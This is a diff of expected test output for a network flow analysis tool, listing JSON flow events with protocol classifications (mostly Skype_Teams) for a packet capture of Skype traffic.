+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970666902,"flow_last_seen":1431970699651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970666903,"flow_last_seen":1431970694442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51257,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970700372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970675992,"flow_last_seen":1431970693146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970682971,"flow_last_seen":1431970695489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970685835,"flow_last_seen":1431970687666,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1150,158 +1149,158 @@
 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431970673966,"flow_last_seen":1431970700297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":11,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51269,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636300,"flow_last_seen":1431970662705,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":50055,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
